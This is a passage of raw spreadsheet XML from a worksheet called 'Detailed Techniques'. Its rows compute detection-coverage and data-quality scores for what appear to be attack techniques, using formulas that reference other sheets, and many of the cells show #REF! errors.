        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F43&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F43))-LEN(SUBSTITUTE(TRIM(F43),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U43" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V43" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F43&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F43))-LEN(SUBSTITUTE(TRIM(F43),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W43" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X43" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F43&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F43))-LEN(SUBSTITUTE(TRIM(F43),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y43" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="44" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A44" s="8" t="s">
        <v>18</v>
      </c>
      <c r="B44" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C44" s="8" t="s">
        <v>463</v>
      </c>
      <c r="D44" s="10" t="s">
        <v>464</v>
      </c>
      <c r="E44" s="10" t="s">
        <v>299</v>
      </c>
      <c r="F44" s="10" t="s">
        <v>413</v>
      </c>
      <c r="G44" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K44,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H44" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F44&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F44))-LEN(SUBSTITUTE(TRIM(F44),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I44" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F44&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F44))-LEN(SUBSTITUTE(TRIM(F44),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J44" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F44&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F44))-LEN(SUBSTITUTE(TRIM(F44),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K44" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L44" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F44&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F44))-LEN(SUBSTITUTE(TRIM(F44),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M44" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N44" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F44&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F44))-LEN(SUBSTITUTE(TRIM(F44),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O44" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P44" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F44&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F44))-LEN(SUBSTITUTE(TRIM(F44),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q44" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R44" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F44&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F44))-LEN(SUBSTITUTE(TRIM(F44),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S44" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T44" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F44&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F44))-LEN(SUBSTITUTE(TRIM(F44),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U44" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V44" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F44&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F44))-LEN(SUBSTITUTE(TRIM(F44),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W44" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X44" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F44&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F44))-LEN(SUBSTITUTE(TRIM(F44),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y44" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="45" spans="1:25" ht="171" x14ac:dyDescent="0.45">
      <c r="A45" s="8" t="s">
        <v>98</v>
      </c>
      <c r="B45" s="8" t="s">
        <v>344</v>
      </c>
      <c r="C45" s="25" t="s">
        <v>465</v>
      </c>
      <c r="D45" s="10" t="s">
        <v>466</v>
      </c>
      <c r="E45" s="10" t="s">
        <v>467</v>
      </c>
      <c r="F45" s="10" t="s">
        <v>468</v>
      </c>
      <c r="G45" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K45,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H45" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F45&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F45))-LEN(SUBSTITUTE(TRIM(F45),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I45" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F45&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F45))-LEN(SUBSTITUTE(TRIM(F45),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J45" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F45&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F45))-LEN(SUBSTITUTE(TRIM(F45),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K45" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L45" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F45&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F45))-LEN(SUBSTITUTE(TRIM(F45),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M45" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N45" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F45&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F45))-LEN(SUBSTITUTE(TRIM(F45),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O45" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P45" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F45&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F45))-LEN(SUBSTITUTE(TRIM(F45),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q45" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R45" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F45&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F45))-LEN(SUBSTITUTE(TRIM(F45),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S45" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T45" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F45&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F45))-LEN(SUBSTITUTE(TRIM(F45),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U45" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V45" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F45&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F45))-LEN(SUBSTITUTE(TRIM(F45),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W45" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X45" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F45&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F45))-LEN(SUBSTITUTE(TRIM(F45),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y45" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="46" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A46" s="8" t="s">
        <v>215</v>
      </c>
      <c r="B46" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C46" s="8" t="s">
        <v>469</v>
      </c>
      <c r="D46" s="10" t="s">
        <v>470</v>
      </c>
      <c r="E46" s="10" t="s">
        <v>471</v>
      </c>
      <c r="F46" s="10" t="s">
        <v>472</v>
      </c>
      <c r="G46" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K46,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H46" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F46&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F46))-LEN(SUBSTITUTE(TRIM(F46),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I46" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F46&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F46))-LEN(SUBSTITUTE(TRIM(F46),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J46" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F46&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F46))-LEN(SUBSTITUTE(TRIM(F46),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K46" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L46" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F46&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F46))-LEN(SUBSTITUTE(TRIM(F46),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M46" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N46" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F46&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F46))-LEN(SUBSTITUTE(TRIM(F46),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O46" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P46" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F46&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F46))-LEN(SUBSTITUTE(TRIM(F46),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q46" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R46" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F46&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F46))-LEN(SUBSTITUTE(TRIM(F46),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S46" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T46" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F46&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F46))-LEN(SUBSTITUTE(TRIM(F46),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U46" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V46" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F46&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F46))-LEN(SUBSTITUTE(TRIM(F46),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W46" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X46" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F46&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F46))-LEN(SUBSTITUTE(TRIM(F46),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y46" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="47" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A47" s="8" t="s">
        <v>42</v>
      </c>
      <c r="B47" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C47" s="8" t="s">
        <v>473</v>
      </c>
      <c r="D47" s="10" t="s">
        <v>474</v>
      </c>
      <c r="E47" s="10" t="s">
        <v>424</v>
      </c>
      <c r="F47" s="10" t="s">
        <v>475</v>
      </c>
      <c r="G47" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K47,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H47" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F47&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F47))-LEN(SUBSTITUTE(TRIM(F47),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I47" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F47&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F47))-LEN(SUBSTITUTE(TRIM(F47),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J47" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F47&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F47))-LEN(SUBSTITUTE(TRIM(F47),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K47" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L47" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F47&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F47))-LEN(SUBSTITUTE(TRIM(F47),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M47" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N47" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F47&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F47))-LEN(SUBSTITUTE(TRIM(F47),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O47" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P47" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F47&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F47))-LEN(SUBSTITUTE(TRIM(F47),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q47" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R47" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F47&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F47))-LEN(SUBSTITUTE(TRIM(F47),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S47" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T47" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F47&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F47))-LEN(SUBSTITUTE(TRIM(F47),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U47" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V47" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F47&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F47))-LEN(SUBSTITUTE(TRIM(F47),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W47" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X47" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F47&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F47))-LEN(SUBSTITUTE(TRIM(F47),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y47" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="48" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A48" s="8" t="s">
        <v>180</v>
      </c>
      <c r="B48" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C48" s="8" t="s">
        <v>476</v>
      </c>
      <c r="D48" s="10" t="s">
        <v>477</v>
      </c>
      <c r="E48" s="10" t="s">
        <v>478</v>
      </c>
      <c r="F48" s="10" t="s">
        <v>479</v>
      </c>
      <c r="G48" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K48,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H48" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F48&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F48))-LEN(SUBSTITUTE(TRIM(F48),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I48" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F48&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F48))-LEN(SUBSTITUTE(TRIM(F48),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J48" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F48&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F48))-LEN(SUBSTITUTE(TRIM(F48),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K48" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L48" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F48&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F48))-LEN(SUBSTITUTE(TRIM(F48),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M48" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N48" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F48&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F48))-LEN(SUBSTITUTE(TRIM(F48),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O48" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P48" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F48&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F48))-LEN(SUBSTITUTE(TRIM(F48),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q48" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R48" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F48&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F48))-LEN(SUBSTITUTE(TRIM(F48),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S48" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T48" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F48&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F48))-LEN(SUBSTITUTE(TRIM(F48),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U48" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V48" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F48&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F48))-LEN(SUBSTITUTE(TRIM(F48),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W48" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X48" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F48&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F48))-LEN(SUBSTITUTE(TRIM(F48),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y48" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="49" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A49" s="8" t="s">
        <v>56</v>
      </c>
      <c r="B49" s="8" t="s">
        <v>8</v>
      </c>
      <c r="C49" s="8" t="s">
        <v>480</v>
      </c>
      <c r="D49" s="10" t="s">
        <v>481</v>
      </c>
      <c r="E49" s="10" t="s">
        <v>482</v>
      </c>
      <c r="F49" s="10" t="s">
        <v>483</v>
      </c>
      <c r="G49" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K49,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H49" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F49&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F49))-LEN(SUBSTITUTE(TRIM(F49),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I49" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F49&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F49))-LEN(SUBSTITUTE(TRIM(F49),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J49" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F49&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F49))-LEN(SUBSTITUTE(TRIM(F49),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K49" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L49" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F49&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F49))-LEN(SUBSTITUTE(TRIM(F49),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M49" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N49" s="20" t="e">
